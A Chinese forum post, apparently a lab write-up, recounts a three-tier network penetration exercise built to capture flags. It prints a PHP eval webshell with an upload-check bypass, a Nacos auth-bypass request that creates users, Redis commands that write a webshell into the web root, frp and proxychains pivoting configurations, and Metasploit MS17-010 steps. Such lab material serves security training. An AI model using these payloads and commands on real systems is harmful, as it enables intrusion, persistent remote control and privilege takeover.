综合渗出-学习三层网络渗出及综合渗出概念

种地  论坛元老 | 2024-12-30 10:06:31 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 1066|帖子 1066|积分 3198

综合渗出-学习三层网络渗出及综合渗出概念

学习:【进来学习】手把手教你三层网络综合渗出
  1. DMZ服务器账号密码:administrator/P@ssw0rd1
  2. 二层服务器账号密码:dmz/P@ssw0rd2
  3. 三层服务器账号密码:pro/P@ssw0rd3
  4. 请确保安装盘硬盘容量大于15G
复制代码
  1. 任务要求:
  2. 拿下DMZ区设备后获取DMZ区administrator桌面下flag文件值
  3. 拿下二层网络设备获取某服务内的flag
  4. 拿下二层网络设备后获取根目录下flag文件值
  5. 拿下三层网络设备后获取pro用户桌面下的flag文件值
复制代码
安装环境-设置 ip

正常导入镜像就行,接下来就是设置网卡,

然后创建三个独立的网卡,修改网卡后注意去设置 DHCP
  1. VMnet2        192.168.37.0
  2. VMnet3        192.168.52.0
  3. VMnet4  192.168.25.0        这个是DMZ的网卡,对外映射的,保证要和我们攻击机在一个网段上
复制代码


然后去设置对应的网卡,DMZ 用 VMnet8 跟我们的 kali 用一样的网卡,然后网络适配器2 选VMnet3


然后就是到二层,第一个网卡 VMnet3,第二个网卡 VMnet2

然后开启我们所有的设备,检察一下 ip,因为 DHCP 的原因,所以 ip 是不一样的,确保在一个段就行。二层跟三层都在内网,我们自然是 ping 不通的,可以尝试一下,只能 ping 通 DMZ
  1. kali:192.168.25.3        (攻击机)
  2. win10:192.168.25.4  (攻击机)
  3. DMZ:网卡1:192.168.25.2        网卡2:192.168.52.129
  4. 二层:网卡1:192.168.52.128        网卡2:192.168.37.128
  5. 三层:192.168.37.129
复制代码


攻击阶段

信息收集
  1. 已知DMZ对外映射靶标IP地址为 192.168.25.2,我们使用Kali和Windows攻击机进行信息收集
复制代码
  1. ./fscan -h 192.168.25.2
复制代码

一层 DMZ 渗出测试
  1. 可以发现开放,8080 web 端口,3306 mysql 数据库端口,21 FTP 端口。此时还在进行 FTP 爆破,太慢了我们中断了,不知道能不能爆破出来,作者给了账号密码,wwwroot/wwwroot,然后我们这里直接用 windows 攻击机进行连接,发现有个压缩包应该是网站源码
复制代码
上面扫描也扫描出一个毛病是一个恣意文件读取,用处不大

我们先进他的背景
  1. http://192.168.25.2:8080/dede/login.php?gotopage=%2Fdede%2F
复制代码

有验证码,是 url 形式的,所以可以用 ddddocr 识别验证码进行爆破,利用这个工具 captcha-killer-modified ,我们先抓一下这个验证码的包,去识别一下

这个识别率还是有点低,直接猜测 弱暗码,admin/admin 登入,然后再内容维护,添加文档,缩 略 图 上传这个位置,存在文件上传毛病


然后上传抓包,使用 GIF98a
<?php
    eval($_POST['shell']);
?> 绕过文件头检测,然后就能看到文件上传的位置,然后使用蚁剑连接,如一直上传失败,且上传方法无误,则可能是DMZ区的机器自动开启的WD杀软,自行关闭即可
  1. GIF98a
  2. <?php
  3.     eval($_POST['shell']);
  4. ?>
复制代码


然后去拿桌面下的  flag 就行

flag:flag{78477a738c06620b872421af357d2cd5}
二层设备渗出测试
  1. 我们先查看一下内网的 ip ,可以看到这里有 2 张网卡,一张是我们外网的,另一张应该就内网的。然后我们上传一个内王扫描工具 fscan,进扫描一下,直接右键上传就行
复制代码


然后我们就扫描一下 52 网段,实行完后刷新一下目次会在当前目次下生成一个 result.txt 文件
  1. fscan.exe -h 192.168.52.0/24
复制代码
可以发现扫描到内网还有一台主机开辟了,端口是 128,下面也扫出了一个毛病,然后我们直接单向对这个靶机进行扫描
  1. fscan.exe -h 192.168.52.128 > 1.txt
复制代码
扫到了一个 8848 端口,是一个 nacos 服务,6379 是 redis 的端口,还一个 80 端口

然后我们想去访问这个 80 端口是访问不到,在内网,所以我们需要通过反向署理进行连接,这里我们使用 frp,这里我们在内网上传 frpc 客服端上,下面是我们 frpc 的设置文件
  1. [common]
  2. server_addr = 192.168.25.1
  3. server_port = 7000
  5. [plugin_socks]
  6. type = tcp
  7. remote_Port = 7777
  8. plugin = socks5
复制代码
然后我们去自己的主机上开启 frps
  1. frps.exe -c frps.toml
复制代码

然后去蚁剑里面开启 frpc
  1. frpc.exe -c frpc.toml
复制代码

然后可以看到自己主机上吸收成功了,如今署理成功了,但是没有应用,就是指明那个工具可以使用这个流量,可以去浏览器里面单独设置,也可以使用工具 Proxifier 进署理

使用工具 Proxifier

设置好 ip ,选择否

然后设置好规则

好希奇,我设置好后,还是一直不能访问,然后去看了一下是 frpc 设置的问题,用上面那个不行
  1. [common]
  2. server_addr = 192.168.25.4
  3. server_port = 7000
  5. [http_proxyx]
  6. type = tcp
  7. remote_port = 7777
  8. plugin = socks5
复制代码
访问 http://192.168.52.128/ 可以访问成功,假如背面又访问不成功了,可能是 frp 的问题,去重启一下就好了,接下来就是对二层进行信息收集了,一开始只是在蚁剑上扫描了一下主机,如今可以对这是开放的端口进行进一步测试
  1. [*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
  2. [*] 开始信息扫描...
  3. [*] 最终有效主机数量: 1
  4. [*] 共解析 218 个有效端口
  5. [+] 端口开放 192.168.52.128:6379
  6. [+] 端口开放 192.168.52.128:8848
  7. [+] 端口开放 192.168.52.128:80
  8. [+] 端口开放 192.168.52.128:22
  9. [+] 存活端口数量: 4
  10. [*] 开始漏洞扫描...
  11. [+] Redis扫描模块开始...
  12. [*] 网站标题 http://192.168.52.128     状态码:200 长度:0      标题:无标题
  13. [*] 网站标题 http://192.168.52.128:8848 状态码:404 长度:431    标题:HTTP Status 404 – Not Found
  14. [+] [发现漏洞] 目标: http://192.168.52.128:8848
  15.   漏洞类型: poc-yaml-alibaba-nacos
  16.   漏洞名称:
  17.   详细信息: %!s(<nil>)
  18. [+] [发现漏洞] 目标: http://192.168.52.128:8848
  19.   漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  20.   漏洞名称:
  21.   详细信息: %!s(<nil>)
  22. [!] 扫描错误 192.168.52.128:22 - 扫描总时间超时: context deadline exceeded
  23. [*] 已完成 3/4 [-] Redis 192.168.52.128:6379 system <nil>
  24. [+] Redis扫描模块结束...
  25. [+] 扫描已完成: 4/4
  26. [*] 扫描结束,耗时: 1m12.2105104s
复制代码
然后我们使用 kali 的 dirsearch 进行扫描一下 192.168.52.128:80 正常来说 kali 肯定也是不能直接去访问的,也要做个署理,我们使用 kali 下的这个工具进行署理 proxychains

先编辑一下设置文件
  1. vi /etc/proxychains.conf
复制代码
  1. # proxychains.conf  VER 4.x
  2. #
  3. #        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.
  6. # The option below identifies how the ProxyList is treated.
  7. # only one option should be uncommented at time,
  8. # otherwise the last appearing option will be accepted
  9. #
  10. dynamic_chain
  11. #
  12. # Dynamic - Each connection will be done via chained proxies
  13. # all proxies chained in the order as they appear in the list
  14. # at least one proxy must be online to play in chain
  15. # (dead proxies are skipped)
  16. # otherwise EINTR is returned to the app
  17. #
  18. #strict_chain
  19. #
  20. # Strict - Each connection will be done via chained proxies
  21. # all proxies chained in the order as they appear in the list
  22. # all proxies must be online to play in chain
  23. # otherwise EINTR is returned to the app
  24. #
  25. #round_robin_chain
  26. #
  27. # Round Robin - Each connection will be done via chained proxies
  28. # of chain_len length
  29. # all proxies chained in the order as they appear in the list
  30. # at least one proxy must be online to play in chain
  31. # (dead proxies are skipped).
  32. # the start of the current proxy chain is the proxy after the last
  33. # proxy in the previously invoked proxy chain.
  34. # if the end of the proxy chain is reached while looking for proxies
  35. # start at the beginning again.
  36. # otherwise EINTR is returned to the app
  37. # These semantics are not guaranteed in a multithreaded environment.
  38. #
  39. #random_chain
  40. #
  41. # Random - Each connection will be done via random proxy
  42. # (or proxy chain, see  chain_len) from the list.
  43. # this option is good to test your IDS :)
  45. # Make sense only if random_chain or round_robin_chain
  46. #chain_len = 2
  48. # Quiet mode (no output from library)
  49. #quiet_mode
  51. ## Proxy DNS requests - no leak for DNS data
  52. # (disable all of the 3 items below to not proxy your DNS requests)
  54. # method 1. this uses the proxychains4 style method to do remote dns:
  55. # a thread is spawned that serves DNS requests and hands down an ip
  56. # assigned from an internal list (via remote_dns_subnet).
  57. # this is the easiest (setup-wise) and fastest method, however on
  58. # systems with buggy libcs and very complex software like webbrowsers
  59. # this might not work and/or cause crashes.
  60. proxy_dns
  62. # method 2. use the old proxyresolv script to proxy DNS requests
  63. # in proxychains 3.1 style. requires `proxyresolv` in $PATH
  64. # plus a dynamically linked `dig` binary.
  65. # this is a lot slower than `proxy_dns`, doesn't support .onion URLs,
  66. # but might be more compatible with complex software like webbrowsers.
  67. #proxy_dns_old
  69. # method 3. use proxychains4-daemon process to serve remote DNS requests.
  70. # this is similar to the threaded `proxy_dns` method, however it requires
  71. # that proxychains4-daemon is already running on the specified address.
  72. # on the plus side it doesn't do malloc/threads so it should be quite
  73. # compatible with complex, async-unsafe software.
  74. # note that if you don't start proxychains4-daemon before using this,
  75. # the process will simply hang.
  76. #proxy_dns_daemon 127.0.0.1:1053
  78. # set the class A subnet number to use for the internal remote DNS mapping
  79. # we use the reserved 224.x.x.x range by default,
  80. # if the proxified app does a DNS request, we will return an IP from that range.
  81. # on further accesses to this ip we will send the saved DNS name to the proxy.
  82. # in case some control-freak app checks the returned ip, and denies to
  83. # connect, you can use another subnet, e.g. 10.x.x.x or 127.x.x.x.
  84. # of course you should make sure that the proxified app does not need
  85. # *real* access to this subnet.
  86. # i.e. dont use the same subnet then in the localnet section
  87. #remote_dns_subnet 127
  88. #remote_dns_subnet 10
  89. remote_dns_subnet 224
  91. # Some timeouts in milliseconds
  92. tcp_read_time_out 15000
  93. tcp_connect_time_out 8000
  95. ### Examples for localnet exclusion
  96. ## localnet ranges will *not* use a proxy to connect.
  97. ## note that localnet works only when plain IP addresses are passed to the app,
  98. ## the hostname resolves via /etc/hosts, or proxy_dns is disabled or proxy_dns_old used.
  100. ## Exclude connections to 192.168.1.0/24 with port 80
  101. # localnet 192.168.1.0:80/255.255.255.0
  103. ## Exclude connections to 192.168.100.0/24
  104. # localnet 192.168.100.0/255.255.255.0
  106. ## Exclude connections to ANYwhere with port 80
  107. # localnet 0.0.0.0:80/0.0.0.0
  108. # localnet [::]:80/0
  110. ## RFC6890 Loopback address range
  111. ## if you enable this, you have to make sure remote_dns_subnet is not 127
  112. ## you'll need to enable it if you want to use an application that
  113. ## connects to localhost.
  114. # localnet 127.0.0.0/255.0.0.0
  115. # localnet ::1/128
  117. ## RFC1918 Private Address Ranges
  118. # localnet 10.0.0.0/255.0.0.0
  119. # localnet 172.16.0.0/255.240.0.0
  120. # localnet 192.168.0.0/255.255.0.0
  122. ### Examples for dnat
  123. ## Trying to proxy connections to destinations which are dnatted,
  124. ## will result in proxying connections to the new given destinations.
  125. ## Whenever I connect to 1.1.1.1 on port 1234 actually connect to 1.1.1.2 on port 443
  126. # dnat 1.1.1.1:1234  1.1.1.2:443
  128. ## Whenever I connect to 1.1.1.1 on port 443 actually connect to 1.1.1.2 on port 443
  129. ## (no need to write :443 again)
  130. # dnat 1.1.1.2:443  1.1.1.2
  132. ## No matter what port I connect to on 1.1.1.1 port actually connect to 1.1.1.2 on port 443
  133. # dnat 1.1.1.1  1.1.1.2:443
  135. ## Always, instead of connecting to 1.1.1.1, connect to 1.1.1.2
  136. # dnat 1.1.1.1  1.1.1.2
  138. # ProxyList format
  139. #       type  ip  port [user pass]
  140. #       (values separated by 'tab' or 'blank')
  141. #
  142. #       only numeric ipv4 addresses are valid
  143. #
  144. #
  145. #        Examples:
  146. #
  147. #               socks5  192.168.67.78   1080    lamer   secret
  148. #               http    192.168.89.3    8080    justu   hidden
  149. #               socks4  192.168.1.49    1080
  150. #               http    192.168.39.93   8080
  151. #
  152. #
  153. #       proxy types: http, socks4, socks5, raw
  154. #         * raw: The traffic is simply forwarded to the proxy without modification.
  155. #        ( auth types supported: "basic"-http  "user/pass"-socks )
  156. #
  157. [ProxyList]
  158. # add proxy here ...
  159. # meanwile
  160. # defaults set to "tor"
  161. socks5  192.168.25.4 7777
复制代码
最下面编辑 socks5 直接走我们 win设置好的署理(我们 win10 攻击机就行负担着一个 vps 的脚色),然后就可以正常进行扫描了
  1. proxychains dirsearch -u http://192.168.52.128/
复制代码

攻击 8848 端口

这里我有个问题:
就是可能是假造机网络设置的问题,我本来想直接在我自己的 windows10 主机上进行流量署理(做 vps),但是一直没成功,不知道为啥,我主机上也有 VMnet4 这个网卡,我还特意把 VMnet2 -3 网卡关了,这样就 ping 不通了,我主机上的 frps 就一直吸收不到,好希奇,可能是我操作的问题,然后就在假造机开了一个 win10 就可以了
然后,我们在假造机里面操作不顺手的话,可以跟 kali 一样,开个署理,然后也能访问了,直接先访问一下扫出来的 /phpinfo.php 有没有啥有用的东西


然后这里还有个知识,就是我们一般需要使用 bp 进行抓包,但是如今浏览器已经开了署理,我们没法开了,那么线下我们可以去 bp 里面先设置一下上游署理,末了启用一下,浏览器那边就行正常开启 bp 的署理,然后就成了


在信息收集的时间知道是这个 cms 的版本是 nacos 2.0.1 ,然后我们去找一下它存在的毛病
【毛病复现】Nacos未授权访问毛病复现
我们访问这个路由 /nacos/v1/auth/users?pageNo=1&pageSize=100,看到有 nacos 账户,暗码证明毛病存在。

然后 http://:8848/nacos/v1/auth/users?username=test&password=test访问上述链接,抓包修改请求访问为POST,放包即可创建恣意用户。

可以看到我们创建的用户

然后我们就可以使用这个用户进行登入了 lpppp/lpppp

然后就能找到 flag 和 password :P@ssw0rd_sec,猜测这个暗码可能 redis 的暗码
flag:flag{7b4b73d7e9ef1c5959efbb820de2495e}
攻击 6379 redis 端口

可以使用 RedisExp​ 去爆破 redis 暗码,但是没爆破出来
  1. RedisEXP_windows_amd64.exe -m brute -r 192.168.52.128 -p 6378 -f rockyou.txt
复制代码
然后我们猜测暗码就行上面我们找到的暗码,我们使用 kali 进行连接一下,可以看到我们不使用署理的话是连接不上的,我们跟上面扫描的时间一样,做个署理就行
  1. proxychains redis-cli -h 192.168.52.128
复制代码
然后可以看到需要认证一下也就是要暗码,我们输入上面的暗码试试

发现成功了,然后尝试利用redis写入webshell,我们刚才有个 phpinfo 可以找一下 web 目次位置,就在 /var/www/html 下


然后就是往目次下写入 webshell
学习:Redis攻防(未授权访问、利用redis写入webshell、使命计划反弹、Shellssh-keygen 公钥登录服务器、利用主从复制RCE)_redis未授权访问写入webshell的步骤不包括-CSDN博客
  1. config set dir /var/www/html/
  2. config set dbfilename shell.php
  3. set xxx "<?php eval($_REQUEST[shell]);?>"
  4. # set xxx "\r\n\r\n<?php eval($_REQUEST['shell']);?>\r\n\r\n"   
  5. #\r\n\r\n 代表换行的意思,用redis写入文件的会自带一些版本信息,如果不换行可能会导致无法执行
  6. save
复制代码

然后我们可以去二层里面看看我们没有没有写入成功,当然角逐的时间肯定是不知道的,测试就行

然后我们先测试一下,直接访问 http://192.168.52.128/shell.php,这里有个点,假如我们在正常溯源,应急的时间看这个文件头可以看到这个是通过 Redis 写入的

接下来直接使用蚁剑进行连接,这里有个问题,假如我想在自己主机上进行连接时蚁剑一样需要去设置一下署理


然后再根目次下发现一个 flag

flag:flag{you_look_look}
三层设备渗出测试

我们先已经拿到了二层的权限,仍旧是先看看网卡,也是有两张网卡的

可以发现已经是存在两张网卡,我们已经上传 fscan 进行扫描,这里我们要上传 linux 版本的

然后进行扫描,这么要给 fscan 一个实行的权限,扫描成功后已经回生成一个文件
  1. chmod +x ./fscan
  2. ./fscan -h 192.168.37.0/24
复制代码

可以看到这里扫到了 2 个 ip, 192.168.37.130 这个 ip 可能是三层的 ip
  1. [+] 端口开放 192.168.37.128:80
  2. [+] 端口开放 192.168.37.130:135
  3. [+] 端口开放 192.168.37.130:445
  4. [+] 端口开放 192.168.37.130:139
  5. [+] 端口开放 192.168.37.128:6379
  6. [+] 端口开放 192.168.37.128:22
  7. [+] 端口开放 192.168.37.128:8848
  8. [*] 网站标题 http://192.168.37.128     状态码:200 长度:0      标题:无标题
  9. [*] NetInfo
  10. [*] 192.168.37.130
  11.    [->] pro-PC
  12.    [->] 192.168.37.130
  13. [+] MS17-010 192.168.37.130        (Windows 7 Enterprise 7600)
  14. [*] 网站标题 http://192.168.37.128:8848 状态码:404 长度:431    标题:HTTP Status 404 – Not Found
  15. [+] [发现漏洞] 目标: http://192.168.37.128:8848
  16.   漏洞类型: poc-yaml-alibaba-nacos
  17.   漏洞名称:
  18.   详细信息: %!s(<nil>)
  19. [+] [发现漏洞] 目标: http://192.168.37.128:8848
  20.   漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  21.   漏洞名称:
  22.   详细信息: %!s(<nil>)
复制代码
然后我们在单独去扫一下 192.168.37.130,可发现这里 fscan 用自己的 poc 库扫到了三层的 MS17-010 毛病,然后就可以直接利用这个毛病
  1. [*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
  2. [*] 开始信息扫描...
  3. [*] 最终有效主机数量: 1
  4. [*] 共解析 218 个有效端口
  5. [+] 端口开放 192.168.37.130:445
  6. [+] 端口开放 192.168.37.130:139
  7. [+] 端口开放 192.168.37.130:135
  8. [+] 存活端口数量: 3
  9. [*] 开始漏洞扫描...
  10. [*] NetInfo
  11. [*] 192.168.37.130
  12.    [->] pro-PC
  13.    [->] 192.168.37.130
  14. [!] 扫描错误 192.168.37.130:139 - netbios error
  15. [+] MS17-010 192.168.37.130        (Windows 7 Enterprise 7600)
  16. [+] 扫描已完成: 3/3
  17. [*] 扫描结束,耗时: 226.882653ms
复制代码
这里一样的如今我们无法利用 dmz 一层的身份去访问三层的设备,我们需要进行署理,这里我们在 DMZ 区上传 frps ,设置文件不动,一样是开放一个 7000 的端口,然后去启动他
  1. frps.exe -c frps.toml
复制代码

然后我们在二层上面上传一个 linux 系统的 frpc ,然后编辑 frpc 的设置文件,server 所在要改成 DMZ 的所在,跟二层同网卡的所在
  1. [common]
  2. server_addr = 192.168.52.129
  3. server_port = 7000
  5. [http_proxyx]
  6. type = tcp
  7. remote_port = 7777
  8. plugin = socks5
复制代码
  1. chmod +x ./frpc
  2. ./frpc -c frpc.toml
复制代码

利用 MS17-010 永恒毛病
  1. 已经利用 kali 的 msf 进行攻击,修改一下配置文件添加一个 DMZ 的代理地址
复制代码
  1. vi /etc/proxychains.conf
复制代码

在启动 msf
  1. proxychains msfconsole
复制代码

利用攻击
  1. search ms17-010
  2. use 0                                                利用第一个 exp
  3. options                                                查看需要哪些参数
  4. set rhosts 192.168.37.130        设置要工具的 ip
  5. run
复制代码

这里前面都成功,但是末了失败,师傅说是路由不可达的问题,应为末了需要反弹 shell 回来,知道 kali 的所在,让这里利用 adc123 师傅的一个 工具 方程式工具包图形
所在:abc123info/EquationToolsGUI: 本程序为美国NSA的方程式工具包图形界面版,由ABC_123于2017年开始编写,仅用来扫描和验证MS17-010、MS09-050、MS08-067毛病,并可协助管理员修复系统毛病。
这里我们一样不能直接去使用,要先去设置一下署理,仍旧利用 Proxifier
这里添加的是 DMZ 区的 ip

创建完之后还是不能直接使用,还要创建一个署理链,按照顺利依次去访问

然后再把署理规则改成我们刚刚创建的署理链,以及目标主机添加一个三层的段


设置好后直接利用工具,先扫描一下,扫到了

注入 dll 文件成功,这个工具就是创建一个用户,跟 kali 那个不一样,kali 是反弹 shell 拿到实行的权限

然后直接打开 mstsc 远程连接主机 192.168.37.130  账号暗码 admin01: Config123!@#

可以发现远程连接成功,而且还是有管理员权限的,然后直接前去文件夹下拿 flag,位置在 C:\Users\pro\Desktop\flag.txt

flag:flag{your're_great}


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

种地

论坛元老
这个人很懒什么都没写!

楼主热帖

标签云

运维 CIO 存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表